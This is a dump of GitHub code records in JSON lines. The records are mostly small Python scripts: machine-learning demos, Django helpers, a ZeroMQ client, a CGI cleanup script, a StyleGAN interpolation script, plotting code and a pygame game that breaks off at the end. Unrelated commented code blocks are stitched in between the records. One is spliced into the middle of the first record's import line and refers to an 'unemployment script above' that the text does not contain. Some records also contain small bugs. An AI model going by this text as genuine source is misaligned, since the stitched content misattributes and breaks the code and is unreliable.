+{"seq_id":"71919137089","text":"# Name: Alyson Matheus Maruyama Nascimento -8532269\n\nimport numpy as np\nfrom 
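# The unemployment script above forecasts twelve months ahead by feeding each
# prediction back in as the newest lag feature. The recursive core of that
# idea for a single series and any sklearn-style regressor (model, lag count
# and horizon are parameters here, not values from the record):
import numpy as np

def recursive_forecast(model, history, n_lags: int, steps: int) -> list:
    # history: 1-D sequence, most recent value last; model maps the n_lags
    # most recent values to the next one.
    lags = list(history[-n_lags:])
    preds = []
    for _ in range(steps):
        x = np.asarray(lags[-n_lags:], dtype=float).reshape(1, -1)
        y = float(model.predict(x)[0])
        preds.append(y)
        lags.append(y)  # the prediction becomes the newest lag
    return preds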
sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn import datasets\nfrom sklearn import svm\n\n# Reading IRIS dataset from sklearn\ndataset = datasets.load_iris()\n\nX = dataset.data[:, :-1]\ny = dataset.target\n\n# Holdout method: simply splits the dataset into Train/Test, \n# using the Train subset to train the model and the test susbset to validate it\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4)\n\n# First classifier: MLP\nmlp1 = MLPClassifier(solver='sgd', alpha=1e-5, hidden_layer_sizes=(5, 3, 3), activation='logistic', learning_rate='constant', learning_rate_init=0.002)\nmlp1.fit(X_train, y_train)\nmlp1_predicted = mlp1.predict(X_test)\nprint('\\n- MLP1 Accuracy:', metrics.accuracy_score(y_test, mlp1_predicted))\nprint('\\n- MLP1 Confusion Matrix:\\n', metrics.confusion_matrix(y_test, mlp1_predicted))\nprint('\\n- MLP1 Classification Report\\n', metrics.classification_report(y_test, mlp1_predicted))\nprint('\\n- MLP1 Absolute Error\\n', metrics.max_error(y_test, mlp1_predicted))\n\n# Second classifier using the same technique (Holdout)\nsvm1 = svm.SVC(kernel='linear')\nsvm1.fit(X_train, y_train)\nsvm1_predicted = svm1.predict(X_test)\nprint('\\n- SVM1 Accuracy:', metrics.accuracy_score(y_test, svm1_predicted))\nprint('\\n- SVM1 Confusion Matrix:\\n', metrics.confusion_matrix(y_test, svm1_predicted))\nprint('\\n- SVM1 Classification Report\\n', metrics.classification_report(y_test, svm1_predicted))\nprint('\\n- SVM1 Absolute Error\\n', metrics.max_error(y_test, mlp1_predicted))\n","repo_name":"alyson1907/RedesNeurais","sub_path":"trabalho-avaliativo/trab1.py","file_name":"trab1.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15733574309","text":"import copy\nanswer = 0\n\n\n# 현재 노드, 자식 제외 갈 수 있는 곳, 양, 늑대\ndef dfs(tree, info, node, can_go, sheep, wolves):\n global answer\n answer = max(answer, sheep)\n new_can_go = copy.deepcopy(can_go)\n\n # 자식 노드가 1개인 경우\n if len(tree[node]) == 1:\n child = tree[node][0]\n if info[child] == 0:\n dfs(tree, info, child, new_can_go, sheep + 1, wolves)\n else:\n if sheep > wolves + 1:\n dfs(tree, info, child, new_can_go, sheep, wolves + 1)\n \n # 자식 노드가 2개인 경우\n if len(tree[node]) == 2:\n for i in range(2):\n child = tree[node][i]\n if info[child] == 0:\n dfs(tree, info, child, new_can_go + [tree[node][(i + 1) % 2]], sheep + 1, wolves)\n else:\n if sheep > wolves + 1:\n dfs(tree, info, child, new_can_go + [tree[node][(i + 1) % 2]], sheep, wolves + 1)\n\n # 자식이 아닌 노드로도 갈 수 있다.\n for x in can_go:\n if info[x] == 0:\n new_can_go.remove(x)\n dfs(tree, info, x, new_can_go + tree[node], sheep + 1, wolves)\n new_can_go.append(x)\n else:\n if sheep > wolves + 1:\n new_can_go.remove(x)\n dfs(tree, info, x, new_can_go + tree[node], sheep, wolves + 1)\n new_can_go.append(x)\n\n\ndef solution(info, edges):\n global answer\n answer = 0\n graph = [[] for _ in range(len(info))]\n\n for parent, child in edges:\n graph[parent].append(child)\n\n dfs(graph, info, 0, [], 1, 0)\n\n return answer\n","repo_name":"socar-abel/Problem_Solving","sub_path":"프로그래머스/Level3/양과 늑대 2트(정답).py","file_name":"양과 늑대 2트(정답).py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"43"} +{"seq_id":"7499414286","text":"from functools import wraps\n\nfrom whovedonethis.loggedinuser import 
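# The classifier script above validates with a single train/test split
# (holdout). k-fold cross-validation averages several splits of the same data
# and is less sensitive to one lucky split; purely an illustrative variant:
from sklearn import datasets, svm
from sklearn.model_selection import cross_val_score

X, y = datasets.load_iris(return_X_y=True)
clf = svm.SVC(kernel='linear')
fold_scores = cross_val_score(clf, X, y, cv=5)  # stratified 5-fold by default
print("mean accuracy: %.3f (+/- %.3f)" % (fold_scores.mean(), fold_scores.std()))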
LoggedInUser\n\ndef add_created_user(f):\n '''\n Decorate pre_save signal for adding created user\n '''\n @wraps(f)\n def wrapper(sender, instance, **kwargs):\n if not instance.id:\n created_by_attr = getattr(instance, \"created_by_field\",\n \"created_by\"\n )\n setattr(instance, created_by_attr, LoggedInUser().current_user)\n return f(sender, instance, **kwargs)\n return wrapper\n\ndef add_updated_user(f):\n '''\n Decorate pre_save signal for adding created user\n '''\n @wraps(f)\n def wrapper(sender, instance, **kwargs):\n updated_by_attr = getattr(instance, \"updated_by_field\",\n \"updated_by\"\n )\n setattr(instance, updated_by_attr, LoggedInUser().current_user)\n return f(sender, instance, **kwargs)\n return wrapper\n \nadd_created_and_updated_user = lambda x: add_created_user(add_updated_user(x))\nadd_created_and_updated_user.__doc__ =\\\n '''\n Decorate pre_save signal for adding created user\n '''\n","repo_name":"Zapix/whovedonethis","sub_path":"whovedonethis/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"39814968098","text":"import zmq\nimport random\nimport logging\nimport sys\nimport os\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n\naddress = os.environ[\"ZMQ_ADDRESS\"]\ncontext = zmq.Context()\n\nlogging.info(\"Connecting to server...\")\nsocket = context.socket(zmq.REQ)\nsocket.connect(address)\nclient_id = random.randrange(1, 10005)\n\nfor request in range(1, 1000):\n logging.info(\"Sending request {}\".format(request))\n socket.send_string(\"PING {} from client {}\".format(request, client_id))\n # Get the reply\n message = socket.recv()\n logging.info(\"Received reply {}: '{}'\".format(request, str(message)))\n","repo_name":"schocco/zmq-docker-compose-example","sub_path":"client/queue_client.py","file_name":"queue_client.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"43"} +{"seq_id":"2826599142","text":"\"\"\"FIRMonitoringSystem URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\n\nfrom . 
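# The ZeroMQ record above is only the REQ side; every send blocks until a
# reply arrives, so it needs a REP peer. A minimal echo server that would
# satisfy it; the bind address is an assumption mirroring ZMQ_ADDRESS.
import zmq

context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://*:5555")

while True:
    message = socket.recv_string()  # wait for the next PING
    socket.send_string("PONG for: " + message)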
import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('fir/', include('fir.urls')),\n path('firBeta/', include('firBeta.urls')),\n path('fault//', views.fault, name='fault'),\n path('success//', views.success, name='success'),\n path('send_mails_for_the_day/', views.send_mails_for_the_day, name='send_mails_for_the_day'),\n # path('populate/', views.populate, name='populate'),\n # path('delete/', views.delete, name='delete'),\n # path('change_passwords/', views.change_passwords, name='change_passwords'),\n path('admin/', admin.site.urls),\n path('account/', include('account.urls')),\n]\n","repo_name":"adityakumar2809/FIRtrackingsystem","sub_path":"FIRMonitoringSystem/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"32508395393","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\nfrom MyChronoGPS_WebPaths import Paths\nPath = Paths();\nautotrack = Path.pathdata+\"/tracks/Autotrack.trk\"\n\nimport glob \nimport os\nimport json\nimport cgi\n\n# mydict représente le retour de la fonction ajax\nmydict = dict()\n\nif os.path.isfile(autotrack):\n try:\n os.remove(autotrack)\n mydict[\"msg\"] = \"autodef track successfully removed\"\n mydict[\"return\"] = 0\n except OSError as err:\n print(\"OS error: {0}\".format(err))\n mydict[\"msg\"] = \"OS error: {0}\".format(err)\n mydict[\"return\"] = 8\n except:\n print(\"Unexpected error:\", sys.exc_info()[0], sys.exc_info()[1])\n mydict[\"msg\"] = \"Unexpected error:\", sys.exc_info()[0], sys.exc_info()[1]\n raise\nelse:\n mydict[\"msg\"] = \"no autodef track to remove\"\n mydict[\"return\"] = 0\n\nprint(\"Content-Type:application/json; charset=UTF-8\\n\")\n\nprint(json.dumps(mydict))","repo_name":"jfk93-fr/MyChronoGPS","sub_path":"Web-Pi/ajax/clear_autodef.py","file_name":"clear_autodef.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"20582226590","text":"import os\nimport sys\n\nsys.path.insert(0, '../')\nsys.path.insert(0, '../LES_Solvers/')\nsys.path.insert(0, '../LES_Solvers/testcases/HIT_2D/')\n\nfrom LES_constants import *\nfrom LES_parameters import *\nfrom LES_plot import *\nfrom HIT_2D import L\n\nfrom MSG_StyleGAN_tf2 import *\n\n\n# local parameters\nNIP = 5 # number of interpolation points \nUMIN = -0.5\nUMAX = 0.5\nVMIN = -0.5\nVMAX = 0.5\nPMIN = -1.0\nPMAX = 1.0\nCMIN = 0.0\nCMAX = 1.0\nWMIN = -0.25\nWMAX = 0.25\n\n\n# clean up\nos.system(\"rm -rf plots\")\nos.system(\"rm -rf uvw\")\nos.system(\"rm -rf energy\")\nos.system(\"mkdir plots\")\nos.system(\"mkdir uvw\")\nos.system(\"mkdir energy\")\n\n\ndir_log = 'logs/'\ntf.random.set_seed(1)\niOUTDIM22 = one/(2*OUTPUT_DIM*OUTPUT_DIM) # 2 because we sum U and V residuals \nP_DNS_t = np.zeros([OUTPUT_DIM, OUTPUT_DIM])\nC_DNS_t = np.zeros([OUTPUT_DIM, OUTPUT_DIM])\n\n\n# loading StyleGAN checkpoint and filter\ncheckpoint.restore(managerCheckpoint.latest_checkpoint)\n\n\n# create variable synthesis model\nlatents = tf.keras.Input(shape=[G_LAYERS, LATENT_SIZE])\nwlatents = layer_wlatent(latents)\ndlatents = wlatents(latents)\noutputs = synthesis(dlatents, training=False)\nwl_synthesis = tf.keras.Model(latents, outputs)\nwl_synthesis2 = tf.keras.Model(latents, outputs)\nwl_synthesis3 = tf.keras.Model(latents, outputs)\n\n# loading StyleGAN checkpoint and filter\nmanagerCheckpoint = tf.train.CheckpointManager(checkpoint, '../' + CHKP_DIR, 
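# The CGI cleanup record above calls sys.exc_info() inside its except branches
# without ever importing sys, so the error path would itself raise NameError.
# A self-contained sketch of the same remove-and-report flow with the import
# in place:
import os
import sys

def remove_track(path: str) -> dict:
    if not os.path.isfile(path):
        return {"msg": "no autodef track to remove", "return": 0}
    try:
        os.remove(path)
        return {"msg": "autodef track successfully removed", "return": 0}
    except OSError as err:
        return {"msg": "OS error: {0}".format(err), "return": 8}
    except Exception:
        return {"msg": "Unexpected error: %s %s" % sys.exc_info()[:2], "return": 8}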
max_to_keep=2)\nmanagerCheckpoint_wl = tf.train.CheckpointManager(checkpoint_wl, '../' + CHKP_DIR_WL, max_to_keep=2)\ncheckpoint_wl.restore(managerCheckpoint_wl.latest_checkpoint)\n\ncheckpoint_wl2 = tf.train.Checkpoint(wl_synthesis2=wl_synthesis)\nmanagerCheckpoint_wl2 = tf.train.CheckpointManager(checkpoint_wl2, '../' + CHKP_DIR_WL, max_to_keep=2)\ncheckpoint_wl2.restore(managerCheckpoint_wl.latest_checkpoint)\n\n\n\n\n@tf.function\ndef find_step(latent, clatents):\n wl_synthesis.trainable_variables[st].assign(clatents)\n predictions = wl_synthesis3(latent, training=False)\n UVW_DNS = predictions[RES_LOG2-2]\n\n return UVW_DNS\n\n\n\n# Change style as interpolation between the 2 wlatent space\nzlatent = tf.random.uniform([1, LATENT_SIZE])\ndlatents = mapping(zlatent, training=False)\n\nfor st in range(1,len(wl_synthesis.trainable_variables)):\n rand0 = wl_synthesis.trainable_variables[st]\n rand1 = wl_synthesis2.trainable_variables[st]\n closePlot = False\n for i in range(NIP):\n if (i==NIP):\n clatents = tf.convert_to_tensor(rand0)\n UVW_DNS = find_step(dlatents, clatents)\n else:\n clatents = tf.convert_to_tensor((1.-i/float(NIP-1))*rand0 + i/float(NIP-1)*rand1) \n\n # if (st==0):\n # nwlatents = tf.concat([clatents, wl_synthesis.trainable_variables[st+1:G_LAYERS]], 0)\n # elif (st==G_LAYERS-1):\n # nwlatents = tf.concat([wl_synthesis.trainable_variables[0:st], clatents], 0)\n # else:\n # nwlatents = tf.concat([wl_synthesis.trainable_variables[0:st], clatents, wl_synthesis.trainable_variables[st+1:G_LAYERS]], 0)\n\n UVW_DNS = find_step(dlatents, clatents)\n\n U_DNS_t = UVW_DNS[0, 0, :, :].numpy()\n V_DNS_t = UVW_DNS[0, 1, :, :].numpy()\n W_DNS_t = UVW_DNS[0, 2, :, :].numpy()\n\n filename = \"plots/plots_sty_\" + str(st) + \"_lev_\" + str(i) + \".png\"\n print_fields(U_DNS_t, V_DNS_t, P_DNS_t, W_DNS_t, OUTPUT_DIM, filename)\n # Umin=UMIN, Umax=UMAX, Vmin=VMIN, Vmax=VMAX, Pmin=PMIN, Pmax=PMAX, Wmin=WMIN, Wmax=WMAX)\n\n filename = \"energy/energy_spectrum_sty_\" + str(st) + \"_lev_\" + str(i) + \".txt\"\n if (i == NIP-1):\n closePlot=True\n plot_spectrum(U_DNS_t, V_DNS_t, L, filename, closePlot)\n\n print(\"done for style \" + str(st) + \" i \" + str(i))\n\n","repo_name":"stfc/StylES","sub_path":"utilities/check_noises.py","file_name":"check_noises.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10640096964","text":"# -*- coding: utf-8 -*-\nfrom platinumegg.app.cabaret.util.url_maker import UrlMaker\nfrom platinumegg.app.cabaret.views.application.battleevent.base import BattleEventBaseHandler\nfrom platinumegg.app.cabaret.util.api import BackendApi\nimport settings\nfrom defines import Defines\n\nclass Handler(BattleEventBaseHandler):\n \"\"\"バトルイベントログインボーナス演出.\n \"\"\"\n \n @classmethod\n def getViewerPlayerClassList(cls):\n return []\n \n def process(self):\n \n args = self.getUrlArgs('/battleeventloginbonusanim/')\n eventid = args.getInt(0)\n# fame = args.getInt(1)\n# fame_next = args.getInt(2)\n rank = args.getInt(3)\n rank_next = args.getInt(4)\n grouprank = args.getInt(5)\n \n model_mgr = self.getModelMgr()\n \n eventmaster = None\n if eventid and rank and rank_next:\n eventmaster = BackendApi.get_battleevent_master(model_mgr, eventid, using=settings.DB_READONLY)\n if eventmaster is None or eventmaster.is_goukon:\n url = self.makeAppLinkUrlRedirect(UrlMaker.mypage())\n self.appRedirect(url)\n return\n \n # 最大ランクのマスター.\n max_rankmaster = 
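# The StylES script above walks between two per-layer latent tensors with a
# plain linear blend, (1 - t) * a + t * b. That interpolation in isolation,
# endpoints included (TensorFlow used only to match the record; assumes n >= 2):
import tensorflow as tf

def lerp_steps(a, b, n: int):
    # Yield n tensors sliding from a to b, both endpoints included.
    for i in range(n):
        t = i / float(n - 1)
        yield tf.convert_to_tensor((1.0 - t) * a + t * b)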
BackendApi.get_battleevent_maxrankmaster(model_mgr, eventid, using=settings.DB_READONLY)\n \n # ランクマスターデータ.\n master_dict = BackendApi.get_battleevent_rankmaster_dict(model_mgr, eventid, list(set([rank, rank_next])), using=settings.DB_READONLY)\n if master_dict.get(rank) is None or master_dict.get(rank_next) is None:\n url = self.makeAppLinkUrlRedirect(UrlMaker.mypage())\n self.appRedirect(url)\n return\n \n if rank < rank_next:\n # ランクアップ.\n effectText0 = Defines.EffectTextFormat.BATTLEEVENT_LOGINBONUS_UP % (master_dict[rank].name, grouprank, master_dict[rank_next].name)\n elif rank == rank_next:\n # ランクステイ.\n effectText0 = Defines.EffectTextFormat.BATTLEEVENT_LOGINBONUS_STAY % (master_dict[rank].name, grouprank, master_dict[rank_next].name)\n else:\n # ランクダウン.\n effectText0 = Defines.EffectTextFormat.BATTLEEVENT_LOGINBONUS_DOWN % (master_dict[rank].name, grouprank, master_dict[rank_next].name)\n \n if max_rankmaster and max_rankmaster.rank == rank_next:\n effectText1 = Defines.EffectTextFormat.BATTLEEVENT_LOGINBONUS_2_RANKMAX\n else:\n effectText1 = Defines.EffectTextFormat.BATTLEEVENT_LOGINBONUS_2\n \n params = {\n 'effectText0' : effectText0,\n 'effectText1' : effectText1,\n 'backUrl' : self.makeAppLinkUrl(UrlMaker.mypage()),\n 'pre' : self.url_static_img + 'event/btevent/%s/' % eventmaster.codename,\n 'logo_img' : 'scenario/event_logo.png',\n 'logo_w_img' : 'scenario/event_logo_w.png',\n }\n self.appRedirectToEffect('btevent/event_result/effect.html', params)\n\ndef main(request):\n return Handler.run(request)\n","repo_name":"hitandaway100/caba","sub_path":"src/dprj/platinumegg/app/cabaret/views/application/battleevent/loginbonusanim.py","file_name":"loginbonusanim.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"309969639","text":"class Solution:\n def searchRange(self, nums: List[int], target: int) -> List[int]:\n j = len(nums)-1\n aux = []\n i=0\n return_null = [-1,-1]\n control = 1\n while control==1:\n if nums[i] == target:\n aux.append(i)\n control = 0\n i = i+1\n control = 1\n if len(aux) == 0:\n return return_null\n while control==1:\n if nums[j] == target:\n aux.append(j)\n control = 0\n j = j-1\n return aux\n","repo_name":"marlusmarcos/Estrutura-de-Dados","sub_path":"prova/find_first_and_last.py","file_name":"find_first_and_last.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7406442586","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import stats\n\nIx = open('FinalProjectData.txt', 'r').read().split()\nvgs =[]\ni1 = []\ni2 = []\ni3 = []\ni4 = []\ni5 = []\n\nvgs2 =[]\ni12 = []\ni22 = []\ni32 = []\ni42 = []\ni52 = []\n\ni1_theo = []\ni2_theo = []\ni3_theo = []\ni4_theo = []\n\ncount = 0\nfor line in Ix:\n if \"v2\" in line:\n pass\n else:\n if count == 0:\n vgs.append(float(line))\n elif count == 2:\n i1.append(float(line))\n elif count == 3:\n i2.append(float(line))\n elif count == 4:\n i3.append(float(line))\n elif count == 5:\n i4.append(float(line))\n elif count == 6:\n i5.append(float(line))\n count = -1\n count += 1\n\nfor i, v in enumerate(vgs):\n if i%6==0:\n vgs2.append(v)\n i12.append(i1[i])\n i22.append(i2[i])\n i32.append(i3[i])\n i42.append(i4[i])\n i52.append(i5[i])\n\nfor i, val in enumerate(i52):\n print(val/i1[1])\n i1_theo.append(16*val)\n i2_theo.append(8*val)\n i3_theo.append(4*val)\n 
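# The searchRange record above scans linearly from both ends and walks past
# the array bounds whenever the target is absent (its emptiness check only
# runs after the first scan). The usual O(log n) version over the sorted
# input:
from bisect import bisect_left, bisect_right

def search_range(nums, target):
    lo = bisect_left(nums, target)
    if lo == len(nums) or nums[lo] != target:
        return [-1, -1]
    return [lo, bisect_right(nums, target) - 1]

assert search_range([5, 7, 7, 8, 8, 10], 8) == [3, 4]
assert search_range([5, 7, 7, 8, 8, 10], 6) == [-1, -1]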
i4_theo.append(2*val)\n\n#print(i1_theo)\n\nif __name__ == '__main__':\n title = \"Plot of Current Vs Gate Voltage in Ladder Network\"\n xLabel = \"Vg (V)\"\n yLabel = \"I (A)\"\n\n Data = plt.plot(vgs2, i12, 'bo', markersize=3, label=\"I1\")\n # Data = plt.plot(vgs2, i22, 'ro', markersize=3, label=\"I2\")\n # Data = plt.plot(vgs2, i32, 'go', markersize=3, label=\"I3\")\n # Data = plt.plot(vgs2, i42, 'ko', markersize=3, label=\"I4\")\n # Data = plt.plot(vgs2, i52, 'co', markersize=3, label=\"I5\")\n\n Data = plt.plot(vgs2, i1_theo, 'r*', markersize=3, label=\"I1 theoretical\")\n # Data = plt.plot(vgs2, i2_theo, 'g*', markersize=3, label=\"I2 theoretical\")\n # Data = plt.plot(vgs2, i3_theo, 'k*', markersize=3, label=\"I3 theoretical\")\n # Data = plt.plot(vgs2, i4_theo, 'c*', markersize=3, label=\"I4 theoretical\")\n\n\n plt.legend()\n plt.xlabel(xLabel)\n plt.ylabel(yLabel)\n plt.title(title)\n plt.grid(True)\n plt.savefig('currents.png', format='png')\n plt.show()\n","repo_name":"vickymmcd/circuits-sp19","sub_path":"Final Project/currents.py","file_name":"currents.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"22685618291","text":"# setup: pip3 install scikit-image\nfrom skimage import io, draw\nfrom PIL import Image, ImageDraw, ImageFont\nimport numpy as np\n\n# read hospitalizations per day from datafile\nPOINTS = list(map(int, open('hospitalized.txt').readlines()))\n\n\nclass Plot:\n def __init__(self, img, start_x, start_y, title=None):\n self.img = img\n self.start_x = start_x\n self.start_y = start_y\n self.title = title\n\n\nclass Prediction:\n def __init__(self, path, x_size, y_size):\n self.path = path\n self.img = io.imread(self.path)\n self.x_size = float(x_size)\n self.y_size = float(y_size)\n self.points = list(map(int, open('hospitalized.txt').readlines()))\n\n def process(self, *search_xy):\n # Scan y axis.\n y_axis = self.scan(search_xy, lambda x, y: (x, y-1))\n y_start = y_axis[0][1]\n y_end = y_axis[-1][1]\n\n # Scan x axis.\n x_axis = self.scan(search_xy, lambda x, y: (x+1, y))\n x_start = x_axis[0][0]\n x_end = x_axis[-1][0]\n\n # Calculate pixels on axis.\n y_pixels = abs(y_start - y_end)\n x_pixels = abs(x_start - x_end)\n\n # Calculate pixel height and width of units.\n y_point_width = y_pixels / self.y_size\n x_point_width = x_pixels / self.x_size\n\n # Draw the plot.\n self.plot(\n self.points,\n start_x=x_start, start_y=y_start,\n x_point_width=x_point_width, y_point_width=y_point_width)\n\n # Cut the image to fit the plot.\n crop_start_x = x_start\n crop_start_y = y_start - y_pixels\n crop_end_x = x_start + x_pixels\n crop_end_y = y_start\n\n def fix(f, nxt):\n count = 0\n while count < 15:\n count += 1\n line, nxt = f(nxt)\n if any(p[0] < 250 for p in line):\n count = 0\n return nxt\n\n for _ in range(1):\n crop_start_y = fix(lambda y: (self.img[y, crop_start_x:crop_end_x], y - 1), crop_start_y)\n crop_end_y = fix(lambda y: (self.img[y, crop_start_x:crop_end_x], y + 1), crop_end_y)\n crop_start_x = fix(lambda x: (self.img[crop_start_y:crop_end_y, x], x - 1), crop_start_x)\n #crop_end_x = fix(lambda x: (self.img[crop_start_y:crop_end_y, x], x + 1), crop_end_x)\n\n return Plot(self.img[crop_start_y:crop_end_y, crop_start_x:crop_end_x],\n x_start - crop_start_x,\n y_start - crop_start_y)\n\n\n def save(self):\n io.imsave('test.png', self.img)\n\n def valid(self, x, y):\n return 0 <= x < len(self.img[0]) and 0 <= y < len(self.img)\n\n def scan(self, 
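# The lab-plot script above builds its theoretical traces as power-of-two
# multiples of the smallest branch current (I1 = 16*I5 down to I4 = 2*I5),
# the signature of a binary-weighted ladder. That relation on its own:
def ladder_theoretical(i5_values, branches: int = 4) -> dict:
    # branch k (1-based) carries 2 ** (branches + 1 - k) times I5
    return {k: [2 ** (branches + 1 - k) * v for v in i5_values]
            for k in range(1, branches + 1)}

assert ladder_theoretical([1.0]) == {1: [16.0], 2: [8.0], 3: [4.0], 4: [2.0]}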
search_xy, step):\n def white(xy):\n x, y = xy\n return (x, y), self.img[y, x][0] >= 200 and step(x, y) if self.valid(x, y) else None\n\n def nonwhite(xy):\n x, y = xy\n return (x, y), self.img[y, x][0] < 200 and step(x, y) if self.valid(x, y) else None\n\n lines = []\n\n start = self.replicate(white, search_xy)[-1]\n block = self.replicate(nonwhite, start)\n\n first = None\n second = None\n\n while block:\n lines.append(block[0])\n startline = self.replicate(white, block[-1])\n\n l = len(startline)\n if not first:\n first = l\n elif first and not second:\n second = l\n elif second and abs(l - second) / second > .1:\n break\n\n block = self.replicate(nonwhite, startline[-1])\n\n return lines\n\n\n def replicate(self, f, nxt):\n results = []\n while nxt:\n v, nxt = f(nxt)\n results.append(v)\n return results\n\n def plot(self, points, start_x, start_y, x_point_width, y_point_width):\n def add_line(img, x0, y0, x1, y1):\n cc, rr, val = draw.line_aa(int(y0), int(x0), int(y1), int(x1))\n img[cc, rr] = (0, 0, 255, 255)\n\n prev_x = start_x\n prev_y = start_y\n for x, p in enumerate(points):\n new_x = start_x + x * x_point_width\n new_y = start_y - p * y_point_width\n add_line(self.img, prev_x, prev_y, new_x, new_y)\n prev_x = new_x\n prev_y = new_y\n\n\ndef merge_vertical(*imgs):\n # Warning: this is a bit rough.\n # Calculate the left margin width, i.e. pixels from left to right before we hit something black.\n left = []\n for i in imgs:\n xs = [0]\n for x in range(len(i[0])):\n white = all(p[0] >= 250 for p in i[0:len(i), x])\n if not white:\n break\n xs.append(x)\n left.append(xs[-1])\n\n # Final image size will fit largest sub-image.\n max_width = max(l + len(i[0]) for l, i in zip(left, imgs))\n\n # Pad the images.\n padded = []\n for l, i in zip(left, imgs):\n left_pad = max(left) - l\n right_pad = max_width - left_pad - len(i[0])\n color = [(255, 255), (255, 255), (255, 255)]\n padded.append(np.pad(i, ((0, 0), (left_pad, right_pad), (0, 0)), mode='constant', constant_values=color))\n\n return np.concatenate(padded)\n\ndef merge(left_explainer, img_groups):\n titles = [i[0] for i in img_groups]\n groups = [i[1] for i in img_groups]\n\n def pad_y(img, before, after):\n color = [(255, 255), (255, 255), (255, 255)]\n return np.pad(img, ((before, after), (0, 0), (0, 0)), mode='constant', constant_values=color)\n\n max_y = max(max(i.start_y for i in group) for group in groups)\n padded_groups = [[pad_y(i.img, max_y - i.start_y, 0) for i in g] for g in groups]\n\n group_height = max(max(len(i) for i in group) for group in padded_groups)\n padded_groups = [[pad_y(i, 0, group_height - len(i)) for i in g] for g in padded_groups]\n\n imgs = [merge_vertical(*group) for group in padded_groups]\n imgs = [add_header(img, title) for img, title in zip(imgs, titles)]\n\n height = max(len(i) for i in imgs)\n plots = np.concatenate([pad_y(i, 0, height - len(i)) for i in imgs], axis=1)\n\n # Make space for side-header (explainer)\n color = [(255, 255), (255, 255), (255, 255)]\n plots = np.pad(plots, ((0, 0), (50, 0), (0, 0)), mode='constant', constant_values=color)\n for n, text in enumerate(left_explainer):\n img = new_header(50, group_height, text)\n img = img.transpose(Image.ROTATE_90)\n pil_to_img(img, plots, start_xy=(0, n * group_height + 25))\n\n return plots\n\n\ndef new_header(height, width, text):\n pil_img = Image.new(mode='RGBA', size=(width, height), color=(255, 255, 255))\n font = ImageFont.truetype(\"fonts/HelveticaNeue Medium.ttf\", 18)\n\n draw = ImageDraw.Draw(pil_img)\n w, h = 
draw.textsize(text, font=font)\n draw.multiline_text(((width-w)/2, (height-h)/2), text, (0,0,0), font=font)\n return pil_img\n\n\ndef pil_to_img(pil_img, img, start_xy=(0,0)):\n for y in range(pil_img.height):\n for x in range(pil_img.width):\n img[start_xy[1]+y, start_xy[0]+x] = pil_img.getpixel((x, y))\n\n\ndef add_header(img, text):\n width = len(img[0])\n height = 60\n pil_img = new_header(height, width, text)\n img = np.pad(img, ((height, 0), (0, 0), (0, 0)), mode='constant')\n pil_to_img(pil_img, img)\n return img\n\n\ndef save(img, path):\n io.imsave(path, img)\n","repo_name":"brinchj/ssi","sub_path":"py/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":7309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26595554879","text":"import os\nimport sys\nimport pygame\nfrom math import floor, sin, cos, atan, sqrt, degrees, radians\nfrom random import randrange, random, randint\nfrom time import sleep\n\nSCREEN_WIDTH = 1000\nSCREEN_HEIGHT = 700\nFRAME_RATE = 100\n\nlives = 3\nimmortal = False\ndead = False\nvictorywave = 0\n\nballcount = 1\nballsize = 30\nballspawny = 630 - (ballsize/2)\n\npygame.init()\n\n# create the screen and the clock\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\nscreen.set_alpha(0) # make alpha bits transparent\nclock = pygame.time.Clock()\n\n# load & scale assets\nneogauge = pygame.mixer.music.load('assets/neogauge.mp3')\n\nclick = pygame.mixer.Sound('assets/click.ogg')\n\nsplat = pygame.mixer.Sound('assets/splat.wav')\n\nog_bg = pygame.image.load(\"assets/background2.png\")\nbg = pygame.transform.scale(og_bg, (SCREEN_WIDTH, SCREEN_HEIGHT))\n\nog_speedfade = pygame.image.load(\"assets/speedfade.png\")\nspeedfade = pygame.transform.scale(og_speedfade, (SCREEN_WIDTH, 70))\n\nyoudied = 